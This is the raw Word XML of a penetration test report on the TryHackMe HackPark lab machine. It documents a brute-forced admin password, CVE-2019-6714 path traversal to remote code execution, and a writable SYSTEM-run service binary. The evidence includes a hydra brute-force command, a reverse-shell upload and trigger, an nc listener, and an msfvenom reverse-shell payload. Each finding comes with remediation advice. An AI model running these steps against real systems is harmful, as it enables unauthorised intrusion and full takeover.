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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY ASSESSMENT &amp;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PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: HackPark (TryHackMe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessor: r3b3Lli0us_kID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: 2026-03-08 | Classification: Confidential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VAPT Report — HackPark</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cover</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A penetration test was conducted against the HackPark server at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">10.48.183.83</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The objective was to identify and exploit vulnerabilities as an unauthenticated external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result: Full system compromise achieved.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Four vulnerabilities were identified — two Critical, one High, one Medium. The attack chain progressed from credential brute force → authenticated RCE → privilege escalation to SYSTEM in a fully automated chain, requiring no insider knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key risk:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The combination of weak credentials and an unpatched CVE (CVE-2019-6714) allowed unauthenticated remote code execution, leading to full SYSTEM access within a single engagement session.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Out of scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All other systems, network infrastructure, external dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="2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Identify exposed attack surface via network enumeration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Attempt authenticated and unauthenticated exploitation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Escalate privileges to highest available level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Document all findings with evidence and remediation guidance</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology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Reconnaissance → Enumeration → Exploitation → Post-Exploitation → Reporting</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F01 — Weak Administrator Credentials</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The BlogEngine.NET administrator account (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) was protected by the weak password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1qaz2wsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a keyboard-walk pattern that appears in common wordlists such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The login form at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/Account/login.aspx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has no rate limiting, lockout policy, or CAPTCHA, allowing automated brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence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Command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hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.48.183.83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http-post-form '/Account/login.aspx:&lt;form-fields&gt;:Login failed' -t 30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[80][http-post-form] host: 10.48.183.83   login: admin   password: 1qaz2wsx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 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Administrative access to the CMS allows content manipulation, file uploads, and further exploitation of application features (as demonstrated in F02).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation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Immediately change the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password to a strong, unique credential (20+ chars, mixed case, symbols)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Enforce account lockout after 5 failed attempts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Implement multi-factor authentication on the admin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Consider restricting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to trusted IP ranges</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F02 — CVE-2019-6714: BlogEngine.NET 3.3.6 Path Traversal → RCE</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BlogEngine.NET 3.3.6 contains a path traversal vulnerability in its file manager API (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/upload?action=filemgr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). An authenticated attacker can upload a malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.ascx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASP.NET user control file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">PostView.ascx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">App_Data/files/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The file is then executed by accessing a blog post with the crafted URL parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?theme=../../App_Data/files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, causing the server to load and execute the uploaded control.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence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Step 1: Upload malicious PostView.ascx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/api/upload?action=filemgr&amp;dirPath=/ HTTP/1.1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[multipart: file=PostView.ascx (reverse shell payload)]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→ 201 Created: "/file.axd?file=%2fPostView.ascx|PostView.ascx"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Step 2: Trigger execution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/post/welcome-to-hack-park?theme=../../App_Data/files HTTP/1.1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→ [Request hangs — reverse shell executes on server]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Listener result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nc -lvnp 443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connect to [192.168.205.106] from (UNKNOWN) [10.48.183.83] 49289</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remote code execution as the IIS application pool identity (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">iis apppool\blog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), providing a persistent foothold with filesystem access, ability to read web.config (credentials), and lateral movement capability.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation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Immediately upgrade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlogEngine.NET to the latest patched release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Restrict file manager access to administrators only, and audit uploaded file types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Implement a WAF rule blocking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.ascx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.aspx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.ashx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uploads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Disable the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">theme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> query parameter or validate it strictly against an allowlist</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F03 — SystemScheduler Insecure Service Binary</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SystemScheduler service runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Message.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on a timed schedule with SYSTEM privileges. The binary file and its parent directory have insecure permissions, granting write access to standard (low-privileged) users. An attacker with a low-privilege shell can replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Message.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a malicious reverse shell payload, which is then executed automatically by the scheduler as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence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Discovered via WinPEAS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C:\Program Files (x86)\SystemScheduler\Message.exe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Permissions: Everyone:(F) — Full Control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Exploit chain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msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;attacker&gt; LPORT=4444 -f exe -o Message.exe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Replace binary, wait for scheduler → SYSTEM shell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whoami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nt authority\system</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full SYSTEM-level compromise of the server. An attacker can read all files (including SAM/SYSTEM hives for credential extraction), install persistent backdoors, and pivot to other systems.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation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Fix ACLs on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files (x86)\SystemScheduler\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — restrict write access to Administrators and SYSTEM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Run the scheduler service under a dedicated low-privilege service account, not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Enable Windows Defender application control to block unsigned binary replacement</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F04 — RDP Exposed to Internet</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Remote Desktop Protocol (RDP) service is listening on port 3389 and is accessible from the public internet with no network-level restriction. This exposes the server to brute-force attacks, RDP vulnerabilities (e.g., BlueKeep/DejaBlue), and credential stuffing.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence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     STATE SERVICE       VERSION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3389/tcp open  ms-wbt-server Microsoft Terminal Services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rdp-ntlm-info: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Target_Name: HACKPARK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Product_Version: 6.3.9600</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation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Block port 3389 at the firewall for all public IP addresses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Require VPN or bastion host access for RDP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Enable Network Level Authentication (NLA)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Apply all Windows security patches (Server 2012 R2 is EOL — consider migration)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Attack Timeline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[Phase 1 — Recon]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nmap -Pn -sC -sV → Ports 80 (IIS 8.5 / BlogEngine.NET) and 3389 (RDP)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[Phase 2 — Exploitation]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Hydra brute force → admin:1qaz2wsx (F01)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CVE-2019-6714 → PostView.ascx uploaded → theme traversal triggers RCE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Reverse shell → iis apppool\blog (F02)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[Phase 3 — Privilege Escalation]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WinPEAS → SystemScheduler insecure binary (F03)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Message.exe replaced → SYSTEM shell (F03)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[Flags]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user.txt → [pending — manual shell required]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root.txt → [pending — manual shell required]</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The HackPark server demonstrated a critically weak security posture. A completely unauthenticated external attacker can achieve full SYSTEM compromise in a short engagement window through a straightforward three-step chain: brute force credentials → exploit unpatched CVE → replace insecure service binary.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Priority actions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Change all default/weak passwords immediately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Patch or replace BlogEngine.NET 3.3.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Fix SystemScheduler binary permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Firewall-restrict RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Consider migrating from Windows Server 2012 R2 (EOL since October 2023)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Appendix</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A — Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B — References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CVE-2019-6714: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6714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BlogEngine.NET exploit: ExploitDB #46353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WinPEAS: https://github.com/carlospolop/PEASS-ng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TryHackMe HackPark Room: https://tryhackme.com/room/hackpark</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C — Vault Links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[[Pentesting/Cheatsheets/Methodology]]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[[Pentesting/Tools]]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[[HomeLab/Kali-VM-Setup]]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[[HomeLab/VPN-Setup]]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HackPark VAPT Report</dc:title>
  <dc:creator>r3b3Lli0us_kID</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-08T12:04:17.476Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-08T12:04:17.477Z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